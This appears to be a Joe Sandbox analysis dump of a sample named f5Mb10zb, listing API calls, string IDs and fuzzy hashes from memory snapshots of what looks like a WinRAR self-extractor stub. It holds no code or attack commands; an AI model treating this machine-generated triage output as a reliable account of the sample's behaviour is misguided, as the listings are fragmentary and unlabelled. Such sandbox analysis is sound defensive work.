                                                                                      • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
                                                                                    • _strlen.LIBCMT ref: 0072E32F
                                                                                    • SetDlgItemTextW.USER32(?,0075E274,?), ref: 0072E38F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0072E3C9
                                                                                    • GetClientRect.USER32(?,?), ref: 0072E3D5
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0072E475
                                                                                    • GetWindowRect.USER32(?,?), ref: 0072E4A2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0072E4DB
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0072E4E3
                                                                                    • GetWindow.USER32(?,00000005), ref: 0072E4EE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0072E51B
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0072E58D
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                    • String ID: $%s:$CAPTION$d$tu
                                                                                    • API String ID: 2407758923-3999767388
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0074CB66
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C71E
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C730
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C742
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C754
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C766
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C778
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C78A
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C79C
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7AE
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7C0
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7D2
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7E4
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7F6
                                                                                    • _free.LIBCMT ref: 0074CB5B
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074CB7D
                                                                                    • _free.LIBCMT ref: 0074CB92
                                                                                    • _free.LIBCMT ref: 0074CB9D
                                                                                    • _free.LIBCMT ref: 0074CBBF
                                                                                    • _free.LIBCMT ref: 0074CBD2
                                                                                    • _free.LIBCMT ref: 0074CBE0
                                                                                    • _free.LIBCMT ref: 0074CBEB
                                                                                    • _free.LIBCMT ref: 0074CC23
                                                                                    • _free.LIBCMT ref: 0074CC2A
                                                                                    • _free.LIBCMT ref: 0074CC47
                                                                                    • _free.LIBCMT ref: 0074CC5F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID: hu
                                                                                    • API String ID: 161543041-1585084052
                                                                                    • Opcode ID: 97723b7191528c125ad941eda02696c70bf1c6e05c882336989d0fae05e44a57
                                                                                    • Instruction ID: 2c437eccb19b2fc8421b7be5887fff9c63b6961110366760ed8b1808f4f83f86
                                                                                    • Opcode Fuzzy Hash: 97723b7191528c125ad941eda02696c70bf1c6e05c882336989d0fae05e44a57
                                                                                    • Instruction Fuzzy Hash: 03317271A02309DFEBA2AA39D84AB5A77E9EF14310F144429F548D7192DF39EC40CF61
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00749705
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 00749711
                                                                                    • _free.LIBCMT ref: 0074971C
                                                                                    • _free.LIBCMT ref: 00749727
                                                                                    • _free.LIBCMT ref: 00749732
                                                                                    • _free.LIBCMT ref: 0074973D
                                                                                    • _free.LIBCMT ref: 00749748
                                                                                    • _free.LIBCMT ref: 00749753
                                                                                    • _free.LIBCMT ref: 0074975E
                                                                                    • _free.LIBCMT ref: 0074976C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: 0du
                                                                                    • API String ID: 776569668-4208203666
                                                                                    • Opcode ID: 023a83f38d76d0b70f45c7ad2d928e75bf1c860736654705ac7f3dc193b4f189
                                                                                    • Instruction ID: f7239fa5934696947d1810d7b22ba277d5667f5e82dc0aad24bd240ac6110089
                                                                                    • Opcode Fuzzy Hash: 023a83f38d76d0b70f45c7ad2d928e75bf1c860736654705ac7f3dc193b4f189
                                                                                    • Instruction Fuzzy Hash: 65119F76A1110DEFCB41EF94C886CDD3BB5AF18350B5154A1FA088B2A2DF36EA509F85
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00739736
                                                                                    • _wcslen.LIBCMT ref: 007397D6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 007397E5
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00739806
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0073982D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                    • String ID: Fjuns$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 1777411235-1427121991
                                                                                    • Opcode ID: cf38d734efac6ec19bf730220f392ee0a61107960667e64d6122e1cc668f4977
                                                                                    • Instruction ID: a5d0d0d53a34af455f92c5e3dec791cc15bdbf87c1b5800f2b1509e4f2fb34fe
                                                                                    • Opcode Fuzzy Hash: cf38d734efac6ec19bf730220f392ee0a61107960667e64d6122e1cc668f4977
                                                                                    • Instruction Fuzzy Hash: 3E313972109711BAF725AB349C0AFEF7798EF82711F10051DF601961D3EBEC9A4883A6
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0073D6C1
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0073D6ED
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0073D709
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0073D720
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0073D734
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0073D75D
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073D764
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0073D76D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 3820355801-1882779555
                                                                                    • Opcode ID: ad3636314b9cd7982434d3a4b5c938716bae4b4a0ee80c605b44b2412e10fabc
                                                                                    • Instruction ID: 4b728aaaaac63cd8519b2a435c44cffcd0b11676a83032c4d5ba09ad926b6aa8
                                                                                    • Opcode Fuzzy Hash: ad3636314b9cd7982434d3a4b5c938716bae4b4a0ee80c605b44b2412e10fabc
                                                                                    • Instruction Fuzzy Hash: 8611E772640710BBF2316BB4AC4FFAF765CAB54B51F108121FA51A50D3D76C8F0546BA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 322700389-393685449
                                                                                    • Opcode ID: 93c13d4189b63901646dc39c978850f17ab0a0b99b433c873188ab3fa37c2d8b
                                                                                    • Instruction ID: d7b69a1f8a17e27655e8811280469f9fc545f9d45e39ebd6472f1e96a4043a26
                                                                                    • Opcode Fuzzy Hash: 93c13d4189b63901646dc39c978850f17ab0a0b99b433c873188ab3fa37c2d8b
                                                                                    • Instruction Fuzzy Hash: FFB19B71900209EFCF29DFA4C8859AEBBB5FF14310F54415AF8196B212D739EA62CF91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$ns
                                                                                    • API String ID: 3519838083-985232756
                                                                                    • Opcode ID: f840231bce9fcafaea3ae0b8195eea8b66582a82d35bcba53529c014c8f894e9
                                                                                    • Instruction ID: 185e538e7b095180a3f616880f2860667cb141f43730761bc760e75808e655d2
                                                                                    • Opcode Fuzzy Hash: f840231bce9fcafaea3ae0b8195eea8b66582a82d35bcba53529c014c8f894e9
                                                                                    • Instruction Fuzzy Hash: CA718970A00629EFDB14DFA4DC959AEB7B8FF48751B04415DF512A72A0CB78AE02CB60
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00726FAA
                                                                                    • _wcslen.LIBCMT ref: 00727013
                                                                                    • _wcslen.LIBCMT ref: 00727084
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3122303884-3508440684
                                                                                    • Opcode ID: 9346dfd6219affe3c430022967f26a9fccf4191c6ae6cfca555491f938f508d7
                                                                                    • Instruction ID: 5e9f567ec094bd9b8b900e1d972c91634fa0be7a3624b1470074dc748998eb4b
                                                                                    • Opcode Fuzzy Hash: 9346dfd6219affe3c430022967f26a9fccf4191c6ae6cfca555491f938f508d7
                                                                                    • Instruction Fuzzy Hash: 4641F7B1D08364FAEB34E774AD8AFEE776C9F44344F004455FA45A6182D77CAA88C721
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073B610
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0073B637
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050E74), ref: 0073B650
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0073B661
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0073B66A
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0073B67E
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0073B694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F6FA6336,00000001,00000000,00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FD99
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE14
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0073FE1F
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE48
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE52
                                                                                    • GetLastError.KERNEL32(80070057,F6FA6336,00000001,00000000,00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE57
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE6A
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0072AF6C,ROOT\CIMV2), ref: 0073FE80
                                                                                    • _com_issue_error.COMSUPP ref: 0073FE93
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 1353541977-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00729387
                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007293AA
                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007293C9
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • _swprintf.LIBCMT ref: 00729465
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 007294D4
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00729514
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: rtmp%d
                                                                                    • API String ID: 3726343395-3303766350
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Us$ps$zs
                                                                                    • API String ID: 176396367-29227579
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00739EEE
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00739F44
                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00739FDB
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00739FE3
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00739FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: s$RarHtmlClassName
                                                                                    • API String ID: 3937224194-2805421010
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 0073122E
                                                                                      • Part of subcall function 0072B146: GetVersionExW.KERNEL32(?), ref: 0072B16B
                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00731251
                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00731263
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00731274
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731284
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731294
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 007312CF
                                                                                    • __aullrem.LIBCMT ref: 00731379
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                    • String ID:
                                                                                    • API String ID: 1247370737-0
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 00722536
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 3053425827-2277559157
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                    • API String ID: 176396367-3568243669
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0074FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0074F6CF
                                                                                    • __fassign.LIBCMT ref: 0074F74A
                                                                                    • __fassign.LIBCMT ref: 0074F765
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0074F78B
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0074FE02,00000000,?,?,?,?,?,?,?,?,?,0074FE02,00000000), ref: 0074F7AA
                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0074FE02,00000000,?,?,?,?,?,?,?,?,?,0074FE02,00000000), ref: 0074F7E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0073CE9D
                                                                                      • Part of subcall function 0072B690: _wcslen.LIBCMT ref: 0072B696
                                                                                    • _swprintf.LIBCMT ref: 0073CED1
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(?,00000066,0076946A), ref: 0073CEF1
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0073CF22
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073CFFE
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 689974011-1360425832
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00742937
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0074293F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 007429C8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 007429F3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00742A48
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 176396367-3743748572
                                                                                    APIs
                                                                                      • Part of subcall function 0074C868: _free.LIBCMT ref: 0074C891
                                                                                    • _free.LIBCMT ref: 0074C8F2
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074C8FD
                                                                                    • _free.LIBCMT ref: 0074C908
                                                                                    • _free.LIBCMT ref: 0074C95C
                                                                                    • _free.LIBCMT ref: 0074C967
                                                                                    • _free.LIBCMT ref: 0074C972
                                                                                    • _free.LIBCMT ref: 0074C97D
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0073E669,0073E5CC,0073E86D), ref: 0073E605
                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0073E61B
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0073E630
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 667068680-1718035505
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0074891E
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 00748930
                                                                                    • _free.LIBCMT ref: 00748943
                                                                                    • _free.LIBCMT ref: 00748954
                                                                                    • _free.LIBCMT ref: 00748965
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: pu
                                                                                    • API String ID: 776569668-250260183
                                                                                    APIs
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007314C2
                                                                                      • Part of subcall function 0072B146: GetVersionExW.KERNEL32(?), ref: 0072B16B
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007314E6
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00731500
                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00731513
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731523
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731533
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2092733347-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00742AF1,007402FC,0073FA34), ref: 00742B08
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00742B16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742B2F
                                                                                    • SetLastError.KERNEL32(00000000,00742AF1,007402FC,0073FA34), ref: 00742B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 941b8fc60ab8f0a0760981059792d9aed4bd2fce025dc9066de6a83096149548
                                                                                    • Instruction ID: a9f1ea530f9bbf9067e35afeccb12d2acbdafda7804a21533dfcc871764861df
                                                                                    • Opcode Fuzzy Hash: 941b8fc60ab8f0a0760981059792d9aed4bd2fce025dc9066de6a83096149548
                                                                                    • Instruction Fuzzy Hash: 44019772208311AEA6582F747C899AB2F59EF047B67E04B3DF018480F2FF9C4D12D208
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                    • _free.LIBCMT ref: 0074981C
                                                                                    • _free.LIBCMT ref: 00749844
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 00749851
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                    • _abort.LIBCMT ref: 00749863
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
